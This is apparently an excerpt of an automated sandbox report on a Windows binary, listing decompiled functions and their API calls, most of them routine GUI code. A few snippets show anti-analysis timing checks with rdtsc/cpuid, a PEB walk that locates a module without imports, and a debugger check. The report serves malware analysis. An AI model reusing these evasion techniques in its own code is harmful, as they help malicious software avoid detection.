    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00410810, Relevance: .0, Instructions: 34
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00406B18, Relevance: .0, Instructions: 32
    C-Code - Quality: 65%
    			E00406B18(char __eax, void* __ebx, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;

				_v24 = __eax;
				asm("rdtsc");
				_v12 = __eax;
				_v8 = __edx;
				asm("cpuid");
				asm("rdtsc");
				_v20 = 0;
				_v16 = __edx;
				 *((intOrPtr*)(_v24 + 4)) = _v16;
				 *_v24 = _v20;
				return E00406A38(_v24,  &_v12);
			}








    0x00406b1e
    0x00406b25
    0x00406b27
    0x00406b2a
    0x00406b2f
    0x00406b31
    0x00406b33
    0x00406b36
    0x00406b43
    0x00406b4c
    0x00406b5c

    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004024F8, Relevance: .0, Instructions: 22
    C-Code - Quality: 100%
    			E004024F8() {
				intOrPtr _v8;
				intOrPtr* _t10;

				_t10 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
				do {
					_t10 =  *_t10;
				} while ( *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x20)) + 0xc)) != 0x320033);
				_v8 =  *((intOrPtr*)(_t10 + 8));
				return _v8;
			}





    0x00402509
    0x0040250c
    0x0040250c
    0x00402511
    0x0040251d
    0x00402528

    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004010B4, Relevance: .0, Instructions: 17
    C-Code - Quality: 46%
    			E004010B4(void* __eax, signed int __edx) {
				signed int _v8;
				intOrPtr _v16;
				signed int _t9;
				signed int _t11;

				asm("rdtsc");
				asm("adc eax, esp");
				asm("rcl eax, 1");
				_t9 = (__eax +  *0x40b118 ^ _t11) + _v16 ^ _t11 ^ __edx;
				 *0x40b118 = _t9;
				_v8 = _t9;
				return _v8;
			}







    0x004010b8
    0x004010c0
    0x004010c8
    0x004010cc
    0x004010ce
    0x004010d4
    0x004010dc

    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 01821560, Relevance: .0, Instructions: 2
    Memory Dump Source
    • Source File: 00000000.00000002.27491620206.01820000.00000040.sdmp, Offset: 01820000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1820000_csshead.jbxd
    Function 01823134, Relevance: .0, Instructions: 2
    Memory Dump Source
    • Source File: 00000000.00000002.27491633392.01823000.00000040.sdmp, Offset: 01823000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1823000_csshead.jbxd
    Function 00412B40, Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 295
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00421700, Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 449windowthread
    APIs
    • GetMenu.USER32(?), ref: 0042173B
      • Part of subcall function 00413BC0: IsMenu.USER32(?), ref: 00413BD9
      • Part of subcall function 00413BC0: DestroyMenu.USER32(?), ref: 00413C12
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00413C37
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00413C44
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,00000416,00000000,00000000), ref: 00413C5B
      • Part of subcall function 00413BC0: GetMenuItemCount.USER32(?), ref: 00413C6C
      • Part of subcall function 00413BC0: GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00413CDE
      • Part of subcall function 00413BC0: GetMenuItemInfoA.USER32 ref: 00413D39
      • Part of subcall function 00413BC0: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 00413D44
      • Part of subcall function 00413BC0: SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 00413D63
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,00000415,000000FF,?), ref: 00413DB9
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,00000442,00000000,?), ref: 00413E03
      • Part of subcall function 00413BC0: SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00413E19
      • Part of subcall function 00413BC0: InvalidateRect.USER32(?,00000000,00000001), ref: 00413E22
      • Part of subcall function 00413BC0: UpdateWindow.USER32(?), ref: 00413E2C
      • Part of subcall function 0041F4A0: FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041F4B8
      • Part of subcall function 0041F4A0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041F4CE
      • Part of subcall function 0041F4A0: LockResource.KERNEL32(00000000), ref: 0041F4D9
      • Part of subcall function 0041F4A0: LoadImageA.USER32(00442B94,?,00000000,00000000,00000000,00002040), ref: 0041F596
      • Part of subcall function 0041F4A0: LoadBitmapA.USER32(00442B94,?), ref: 0041F5B3
      • Part of subcall function 0041F4A0: DeleteObject.GDI32(00000000), ref: 0041F623
      • Part of subcall function 0041F4A0: DeleteObject.GDI32(00000000), ref: 0041F652
    • SetMenu.USER32(?,00000000), ref: 00421766
      • Part of subcall function 0041EBA0: FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041EBC5
      • Part of subcall function 0041EBA0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041EBDE
      • Part of subcall function 0041EBA0: LockResource.KERNEL32(00000000), ref: 0041EBE9
      • Part of subcall function 0041EBA0: CreateWindowExA.USER32(00000000,ToolbarWindow32,00000000,?,00000000,00000000,00000064,00000064,?,?,00442B90,00000000), ref: 0041ECD8
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,0000041E,00000014,00000000), ref: 0041ED13
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041ED1A
      • Part of subcall function 0041EBA0: GetStockObject.GDI32(0000000D), ref: 0041ED26
      • Part of subcall function 0041EBA0: GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
      • Part of subcall function 0041EBA0: FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041ED77
      • Part of subcall function 0041EBA0: LoadResource.KERNEL32(?,00000000), ref: 0041ED83
      • Part of subcall function 0041EBA0: LockResource.KERNEL32(00000000), ref: 0041ED8A
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,00000413,?,?), ref: 0041EDF5
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,00000414,?,?), ref: 0041EE07
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,00000420,00000000,?), ref: 0041EE2D
      • Part of subcall function 0041EBA0: SendMessageA.USER32(00000000,0000041F,00000000,?), ref: 0041EE5D
    • CreateWindowExA.USER32(00000000,ReBarWindow32,00000000,56002640,00000000,00000000,00000064,00000064,?,0000E800,00442B90,00000000), ref: 004217B3
    • SendMessageA.USER32 ref: 004217EF
    • SendMessageA.USER32(00000000,00000418,00000000,00000000), ref: 00421823
      • Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD
    • SendMessageA.USER32 ref: 0042187C
    • SendMessageA.USER32(00000000,0000041D,-00000001,00000000), ref: 004218B2
    • SendMessageA.USER32(00000000,0000041D,00000000,00000000), ref: 004218D5
    • GetWindowRect.USER32(00000000,00000000), ref: 004218EB
    • SendMessageA.USER32(?,00000401,000000FF,?), ref: 00421926
    • SendMessageA.USER32(00000000,00000455,00000000,00000000), ref: 00421936
    • SendMessageA.USER32(00000000,00000454,00000000,00000000), ref: 00421944
    • SendMessageA.USER32(00000000,00000418,00000000,00000000), ref: 00421957
    • SendMessageA.USER32 ref: 004219AC
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 004219DA
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 004219FE
    • GetWindowRect.USER32(00000000,?), ref: 00421A14
    • SendMessageA.USER32(?,00000401,000000FF,?), ref: 00421A51
    • SendMessageA.USER32(00000000,00000455,00000000,00000000), ref: 00421A5F
    • SendMessageA.USER32(00000000,00000454,00000000,00000000), ref: 00421A6C
    • LoadStringA.USER32(00442B94,0000E001,?,00000080), ref: 00421A99
      • Part of subcall function 0041EA50: GetWindowLongA.USER32(?), ref: 0041EA81
      • Part of subcall function 0041EA50: GetWindowLongA.USER32(?,000000F0), ref: 0041EA90
      • Part of subcall function 0041EA50: GetWindowLongA.USER32(?,000000F0), ref: 0041EAA6
      • Part of subcall function 0041EA50: SetWindowLongA.USER32(?,000000F0,00000000), ref: 0041EABB
      • Part of subcall function 0041EA50: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000003F), ref: 0041EAD1
      • Part of subcall function 0041EA50: CreateWindowExA.USER32(00000200,MDIClient,00000000,56000001,00000000,00000000,00000001,00000001,?,?,00442B90,773A8CD0), ref: 0041EB01
      • Part of subcall function 0041EA50: BringWindowToTop.USER32(00000000), ref: 0041EB18
      • Part of subcall function 0041E9C0: IsWindow.USER32(0000E900), ref: 0041E9D0
      • Part of subcall function 0041E9C0: IsWindow.USER32(?), ref: 0041E9E3
      • Part of subcall function 0041E9C0: GetWindowLongA.USER32(?,000000FC), ref: 0041E9F8
      • Part of subcall function 0041E9C0: SetWindowLongA.USER32(?,000000FC,?), ref: 0041EA12
    • GetCurrentThreadId.KERNEL32 ref: 00421BD2
      • Part of subcall function 0041F120: RtlEnterCriticalSection.NTDLL(00442A20), ref: 0041F12F
      • Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F156
      • Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F16C
      • Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F189
      • Part of subcall function 0041F120: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,00421BE3,00000000,?,?,?,?,?,?,00000000,00000404), ref: 0041F1A2
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042E40B, Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 134libraryLIBRARYCODE
    APIs
      • Part of subcall function 00425CFE: RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    • LoadLibraryW.KERNEL32(USER32.DLL,00442C78,00000314,00000000), ref: 0042E446
    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0042E462
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E473
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042E480
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E483
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042E490
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E493
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0042E4A0
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E4A3
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042E4B4
    • RtlEncodePointer.NTDLL(00000000), ref: 0042E4B7
    • RtlDecodePointer.NTDLL(0044361C), ref: 0042E4D9
    • RtlDecodePointer.NTDLL ref: 0042E4E3
    • RtlDecodePointer.NTDLL(?), ref: 0042E522
    • RtlDecodePointer.NTDLL(?), ref: 0042E53C
    • RtlDecodePointer.NTDLL(00442C78), ref: 0042E550
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00416AF0, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 180windowstringthread
    APIs
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 00416B05
    • GetCurrentThreadId.KERNEL32 ref: 00416B27
    • SetWindowsHookExA.USER32(00000005,Function_00006430,00442B90,00000000), ref: 00416B36
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000000), ref: 00411928
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000002), ref: 00411932
      • Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C
    • TrackPopupMenuEx.USER32(?,?,00000000,?,?,?), ref: 00416B89
    • UnhookWindowsHookEx.USER32(00442A54), ref: 00416BA1
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00416BB8
    • UpdateWindow.USER32(?), ref: 00416BC8
    • GetParent.USER32(?), ref: 00416BD4
    • GetParent.USER32(00000000), ref: 00416BE3
    • UpdateWindow.USER32(?), ref: 00416BEA
    • GetMenuItemCount.USER32(773B2CA0), ref: 00416C2A
    • GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00416C6B
    • GetMenuItemInfoA.USER32(773B2CA0,00000000,00000001,0000002C), ref: 00416CA3
    • lstrlen.KERNEL32(?), ref: 00416CDD
    • SetMenuItemInfoA.USER32(773B2CA0,00000000,00000001,0000002C), ref: 00416CF8
    • ModifyMenuA.USER32(773B2CA0,00000000,?,?,00000000), ref: 00416D17
    • GetMenuItemCount.USER32(773B2CA0), ref: 00416D34
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00416ED0, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 236windowregistryclipboard
    APIs
    • SendMessageA.USER32 ref: 00416F08
    • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 00416F2D
    • MapWindowPoints.USER32(?,00000000,0000041D,00000002), ref: 00416F3C
    • GetSubMenu.USER32(?,?), ref: 00416F7D
    • SendMessageA.USER32 ref: 00416FB0
    • SendMessageA.USER32(?,00000403,?,00000001), ref: 00416FC8
    • SendMessageA.USER32(?,00000448,?,00000000), ref: 00416FD6
      • Part of subcall function 00416AF0: RtlEnterCriticalSection.NTDLL(00442B64), ref: 00416B05
      • Part of subcall function 00416AF0: GetCurrentThreadId.KERNEL32 ref: 00416B27
      • Part of subcall function 00416AF0: SetWindowsHookExA.USER32(00000005,Function_00006430,00442B90,00000000), ref: 00416B36
      • Part of subcall function 00416AF0: TrackPopupMenuEx.USER32(?,?,00000000,?,?,?), ref: 00416B89
      • Part of subcall function 00416AF0: UnhookWindowsHookEx.USER32(00442A54), ref: 00416BA1
      • Part of subcall function 00416AF0: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00416BB8
      • Part of subcall function 00416AF0: UpdateWindow.USER32(?), ref: 00416BC8
      • Part of subcall function 00416AF0: GetParent.USER32(?), ref: 00416BD4
      • Part of subcall function 00416AF0: GetParent.USER32(00000000), ref: 00416BE3
      • Part of subcall function 00416AF0: UpdateWindow.USER32(?), ref: 00416BEA
      • Part of subcall function 00416AF0: GetMenuItemCount.USER32(773B2CA0), ref: 00416C2A
      • Part of subcall function 00416AF0: GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00416C6B
      • Part of subcall function 00416AF0: GetMenuItemInfoA.USER32(773B2CA0,00000000,00000001,0000002C), ref: 00416CA3
      • Part of subcall function 00416AF0: lstrlen.KERNEL32(?), ref: 00416CDD
      • Part of subcall function 00416AF0: SetMenuItemInfoA.USER32(773B2CA0,00000000,00000001,0000002C), ref: 00416CF8
      • Part of subcall function 00416AF0: ModifyMenuA.USER32(773B2CA0,00000000,?,?,00000000), ref: 00416D17
      • Part of subcall function 00416AF0: GetMenuItemCount.USER32(773B2CA0), ref: 00416D34
    • SendMessageA.USER32(?,00000403,?,00000000), ref: 00417026
    • GetFocus.USER32 ref: 0041702B
    • SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041703F
    • PeekMessageA.USER32(?,?,00000201,00000201,00000000), ref: 00417083
    • PtInRect.USER32(?,?,?), ref: 00417098
    • PeekMessageA.USER32(?,?,00000201,00000201,00000001), ref: 004170B7
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 004170DB
    • RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalAutoPopupMsg), ref: 004170EF
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 004170FB
    • PostMessageA.USER32(?,00442B50,?,00000000), ref: 0041711C
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00417140
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414100
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414119
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
    • SendMessageA.USER32(?,00000448,?,00000000), ref: 00417195
    • SendMessageA.USER32(?,00000449,00000001,00000000), ref: 004171A4
    Strings
    • WTL_CmdBar_InternalAutoPopupMsg, xrefs: 004170EA
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00415C90, Relevance: 36.4, APIs: 24, Instructions: 371window
    APIs
    • DrawEdge.USER32(?,?,00000006,00000002), ref: 00415CE8
    • OffsetRect.USER32(?,00000000,?), ref: 00415D68
    • GetSysColor.USER32(0000000F), ref: 00415DE9
    • SetTextColor.GDI32(?,00000000), ref: 00415DED
    • GetSysColor.USER32(00000014), ref: 00415DF9
    • SetBkColor.GDI32(?,00000000), ref: 00415DFD
      • Part of subcall function 00412AC0: CreatePatternBrush.GDI32(00000000), ref: 00412B14
      • Part of subcall function 00412AC0: DeleteObject.GDI32(00000000), ref: 00412B1D
    • SetBrushOrgEx.GDI32(?,?,?,00000000), ref: 00415E20
    • FillRect.USER32(?,?,77397600), ref: 00415E2D
    • SetTextColor.GDI32(?,?), ref: 00415E39
    • SetBkColor.GDI32(?,?), ref: 00415E45
    • DeleteObject.GDI32(77397600), ref: 00415E50
    • DrawEdge.USER32(?,?,?,0000000F), ref: 00415EA4
    • FillRect.USER32(?,?,00000005), ref: 00415EDA
    • FillRect.USER32(?,?,00000005), ref: 00415EED
    • GetSysColorBrush.USER32(00000004), ref: 00415F0E
    • GetSysColorBrush.USER32(00000010), ref: 00415F16
    • GetSysColorBrush.USER32(00000014), ref: 00415F1B
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,00000000), ref: 004147C8
      • Part of subcall function 00414710: PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
      • Part of subcall function 00414710: GetSysColor.USER32(00000012), ref: 004147F2
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,?), ref: 0041485A
      • Part of subcall function 00414710: DeleteObject.GDI32(00000000), ref: 00414865
      • Part of subcall function 00414710: DeleteDC.GDI32(00000000), ref: 00414872
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 00415F63
    • GetSysColor.USER32(-00000004), ref: 00415FCE
    • FillRect.USER32(?,?,-00000003), ref: 0041601C
    • SetBkMode.GDI32(?,00000001), ref: 0041604B
    • GetSysColor.USER32(-00000007), ref: 0041607C
    • OffsetRect.USER32(?,00000001,00000001), ref: 004160BA
    • GetSysColor.USER32(00000014), ref: 004160C2
      • Part of subcall function 00412A20: lstrlen.KERNEL32(?,?,00000000,?,7740E270), ref: 00412A33
      • Part of subcall function 00412A20: SetTextColor.GDI32(00000000,?), ref: 00412A5B
      • Part of subcall function 00412A20: DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
      • Part of subcall function 00412A20: DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00415020, Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 279window
    APIs
    • GetMenuItemCount.USER32(?), ref: 00415083
    • GetVersionExA.KERNEL32(?,?,?,00000090,?,?,00000030), ref: 0041510E
    • GetMenuItemInfoA.USER32 ref: 0041516C
    • CharNextA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151A6
    • CharLowerA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151C7
    • CharLowerA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 004151D2
    • PostMessageA.USER32(?,00000448,000000FF), ref: 00415226
    • SendMessageA.USER32(?,0000044E,?,?), ref: 00415284
    • PostMessageA.USER32(?,00000448,000000FF), ref: 0041529F
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414100
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414119
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
      • Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
      • Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
      • Part of subcall function 00411630: LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
      • Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
      • Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
      • Part of subcall function 00411630: PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
      • Part of subcall function 00411630: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA
    • IsWindowEnabled.USER32(?), ref: 004152E4
    • GetClientRect.USER32(?,?), ref: 0041530D
    • SendMessageA.USER32(?,0000041D,?,?), ref: 00415338
    • SendMessageA.USER32(?,00000417,?,?), ref: 00415363
      • Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
      • Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2
    • PostMessageA.USER32(?,00000100,00000028), ref: 004153AD
      • Part of subcall function 00410FF0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00410FFF
      • Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
      • Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B
    • MessageBeep.USER32 ref: 004153D2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00413BC0, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196windowstring
    APIs
    • IsMenu.USER32(?), ref: 00413BD9
    • UpdateWindow.USER32(?), ref: 00413E2C
      • Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
      • Part of subcall function 00412950: SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004129F7
      • Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    • DestroyMenu.USER32(?), ref: 00413C12
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00413C37
    • SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00413C44
    • SendMessageA.USER32(?,00000416,00000000,00000000), ref: 00413C5B
    • GetMenuItemCount.USER32(?), ref: 00413C6C
    • GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00413CDE
    • GetMenuItemInfoA.USER32 ref: 00413D39
    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 00413D44
    • SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 00413D63
    • SendMessageA.USER32(?,00000415,000000FF,?), ref: 00413DB9
    • SendMessageA.USER32(?,00000442,00000000,?), ref: 00413E03
    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00413E19
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00413E22
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00418BA0, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 233window
    APIs
      • Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD
    • SendMessageA.USER32(?,0000041D,?,?), ref: 00418BF9
    • SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00418C0C
    • SendMessageA.USER32(?,0000052E,00000000,00000000), ref: 00418C26
    • CreatePopupMenu.USER32 ref: 00418C34
    • GetClientRect.USER32(?,?), ref: 00418C58
    • SendMessageA.USER32(?,00000417,00000000,?), ref: 00418C88
    • SendMessageA.USER32(?,0000041D,00000000,?), ref: 00418CB3
    • GetMenuItemCount.USER32(?), ref: 00418CE3
    • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00418CFF
    • AppendMenuA.USER32(?,00000000,?,00433984), ref: 00418E6B
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 00418D6D
    • AppendMenuA.USER32(?,00000000,00000014,?), ref: 00418D8D
    • SendMessageA.USER32 ref: 00418DFB
    • LoadStringA.USER32(00442B94,?,?,000000C8), ref: 00418E2E
    • GetMenuItemCount.USER32(?), ref: 00418E87
    • DestroyMenu.USER32(?), ref: 00418E96
    • MessageBeep.USER32(000000FF), ref: 00418E9E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00414300, Relevance: 28.8, APIs: 19, Instructions: 298windowstring
    APIs
    • GetVersionExA.KERNEL32(?), ref: 00414333
    • SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 00414376
    • GetObjectA.GDI32(?,0000003C,?), ref: 004143AA
    • lstrcmp.KERNEL32(?,?), ref: 00414476
    • CreateFontIndirectA.GDI32(?), ref: 00414488
    • DeleteObject.GDI32(?), ref: 004144A9
    • DeleteObject.GDI32(?), ref: 004144C4
    • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 004144DB
    • SendMessageA.USER32(?,0000041C,00000000,00436330), ref: 004144EC
    • SendMessageA.USER32(?,00000421,00000000,00000000), ref: 004144F9
    • SelectObject.GDI32(00000000,?), ref: 00414519
    • DrawTextA.USER32(00000000,0043632C,000000FF,?,00000424), ref: 00414541
    • SetRectEmpty.USER32(?), ref: 00414559
    • DrawTextA.USER32(00000000,00436328,000000FF,?,00000424), ref: 00414571
    • SelectObject.GDI32(00000000,00000000), ref: 00414593
    • GetVersionExA.KERNEL32(?), ref: 004145C6
    • SystemParametersInfoA.USER32 ref: 004145EE
      • Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
      • Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B
    • SystemParametersInfoA.USER32(00001022,00000000,?,00000000), ref: 0041465D
    • GetVersionExA.KERNEL32(?), ref: 004146A8
